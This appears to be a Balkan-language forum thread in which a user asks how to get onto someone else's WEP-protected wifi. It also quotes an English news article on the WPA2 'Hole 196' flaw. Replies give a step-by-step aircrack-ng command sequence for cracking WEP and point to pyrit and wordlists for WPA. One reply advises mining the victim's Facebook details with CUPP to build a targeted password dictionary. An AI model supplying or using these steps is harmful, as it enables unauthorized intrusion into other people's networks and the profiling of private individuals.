Znaci zelio bih da se prikacim na jedan wi-fi network i on je zasticen WEP key-om... Znaci hvatam par njih ali oni imaju onu jacu zastitu WPA2 sto li vec Ovo sam ukapirao da je najlaksa pa postoji li neki nacin da se zakacim na to ? Kucao sam neke passworde koji mogu biti i cak u jednom trenutku sam se i zakacio ,ono pise connected ali ovamo dolje onaj znak uzvika i pise limited acces no internet acces , tako nesto... Ima li nade?
Para vrti dje burgija neće.
mos preko backtrack-a,proguglaj malo.
The moon will illuminate my room and soon I'm consumed by my doom
koliko ja znam,nemoze
http://www.youtube.com/watch?v=PCjwxItb_p4
Les chiens aboient, la caravane passe.
WEP lagano preko backtrack-a
Skines gore pomenuti BT, upalis konzolu i evo ti komande. Imas dosta programa koji to "rade" i pod win platformom, ali win ne podrzava packet injection, i trebaju neki posebni drajveri za wlan karticu, tako da skini BT i udri
1.SHELL
Code:
airmon-ng
airodump-ng wlan0
airodump-ng -w wep -c "channel" --bssid "bssid" wlan0
2.SHELL
Code:
aireplay-ng -1 0 -a "bssid" wlan0
3.SHELL
Code:
aireplay-ng -3 -b "bssid" wlan0
4.SHELL
Code:
aircrack-ng wep-01.cap
nema sanse ne mlatite bzv
A koji je fabricki password? Ima li neki default?
Ja sam nesto ceprkao oko probijanja tih enkripcija sa aircrack-om pod Win platformom. Uzeo wifi karticu sa Atheros chipestom i sitgao do koraka kada trebas da postavis komp ukljucen par dana da dekriptuje sakupljene `pakete`, ili kako se vec kaze?! :mrgreen:
moze se i WPA lako provaliti, mada treba vise vremena jer ne podrzava "injekciju paketa". Naci AP kome je postavljen defoltni pass je rijetkost. To sto tebi pise limited acces, bilo koji pass da ukucas posle par trenutaka ce ti to ispisati, tako da nikakva podesavanja ti netrebaju, po difoltu je postavljeno da ti DHCP dodjeljuje automatski adresu, tako da netrebas nista podesavati.
ne treba mi stoevra
ne vozim beemvea
doslo vrjeme da se promijeni potpis :)
ko malo procacka i prouci
http://www.smallnetbuilder.com/wirel...--wpa2?start=1
:P srecno .
a ovo je tekst sa jednog sajta ...
Well as it tends to be, when something is scrutinized for long enough and with enough depth flaws will be uncovered. This time the victim is WPA2 – the strongest protection for your Wi-fi network which is standardized.
WEP fell long ago and there’s a myriad of WEP Cracking tools available. In 2008 it was reported flaws had been found in WPA and it was partially cracked.
These factors of course shifted a lot of people to WPA2, which has now been found to have certain flaws.
Perhaps it was only a matter of time. But wireless security researchers say they have uncovered a vulnerability in the WPA2 security protocol, which is the strongest form of Wi-Fi encryption and authentication currently standardized and available.
Malicious insiders can exploit the vulnerability, named “Hole 196″ by the researcher who discovered it at wireless security company AirTight Networks. The moniker refers to the page of the IEEE 802.11 Standard (Revision, 2007) on which the vulnerability is buried. Hole 196 lends itself to man-in-the-middle-style exploits, whereby an internal, authorized Wi-Fi user can decrypt, over the air, the private data of others, inject malicious traffic into the network and compromise other authorized devices using open source software, according to AirTight.
The researcher who discovered Hole 196, Md Sohail Ahmad, AirTight technology manager, intends to demonstrate it at two conferences taking place in Las Vegas next week: Black Hat Arsenal and DEF CON 18.
It’s a pretty interesting attack and leverages a man-in-the-middle style exploit to decrypt data from the wire and inject malicious packets onto the network.
The researched Md Sohail Ahmad is going to demo the exploit at 2 upcoming conferences (Black Hat and DEF CON 18) so I’ll be looking out for the slides and videos on that. We’ll have to wait and see if this is another ‘mostly theoretical‘ attack – or something that can actually be implemented in the wild.
The Advanced Encryption Standard (AES) derivative on which WPA2 is based has not been cracked and no brute force is required to exploit the vulnerability, Ahmad says. Rather, a stipulation in the standard that allows all clients to receive broadcast traffic from an access point (AP) using a common shared key creates the vulnerability when an authorized user uses the common key in reverse and sends spoofed packets encrypted using the shared group key.
Ahmad explains it this way:
WPA2 uses two types of keys: 1) Pairwise Transient Key (PTK), which is unique to each client, for protecting unicast traffic; and 2) Group Temporal Key (GTK) to protect broadcast data sent to multiple clients in a network. PTKs can detect address spoofing and data forgery. “GTKs do not have this property,” according to page 196 of the IEEE 802.11 standard.
These six words comprise the loophole, Ahmad says.
The upside is that the attack is limited to people who can genuinely authenticate to the network first, the downside that means large organizations using WPA2 in trouble – as generally most damage comes from the inside.
It’s also something to think about when connecting to ISP/public Wi-fi hotspots using WPA2 encryption.
I’m sure there will be more news about this soon.
I ovaj kod mogu da vam nabavim ako koga bude zanimalo. :P i takodje imam jedan program koji moze da probije sve tri zastite, ali uz njega dodje tutorial kojim bi se morali pozabavit ... no, ako je to kome tolko vazno ... pa ako uspije, nek uzme pare ovome momku gore
EDIT : lista rijeci : http://wifi0wn.wordpress.com/wepwpaw...ng-dictionary/
Last edited by b02; 07-12-10 at 15:34.
I don't suffer from insanity.I just enjoy it every moment.
We are all anonymous.
WPA(2): http://code.google.com/p/pyrit/
preporuka CUDA GPU.
Obično korisnici stavljaju ključ koji je ime/prezime (sebe, žene/djevojke, djeteta), datum, rođenja, broj godina i razne kombinacije toga... I obično su svi na facebooku gdje može lagano da se dođe do svih tih informacija. Kad dođeš to info koristi alat CUPP http://www.remote-exploit.org/?p=546 (autor alata nam je zemljak inače :P) i generiši rečnik za tog korisnika. Alat će te priupitati za osobne detalje osobe koju napadaš i generisati rečnik sa raznim kombinacijama.
Onda jednostavan dictionary attack će biti dovoljan. Ovo obično prolazi.
There are currently 1 users browsing this thread. (0 members and 1 guests)
Bookmarks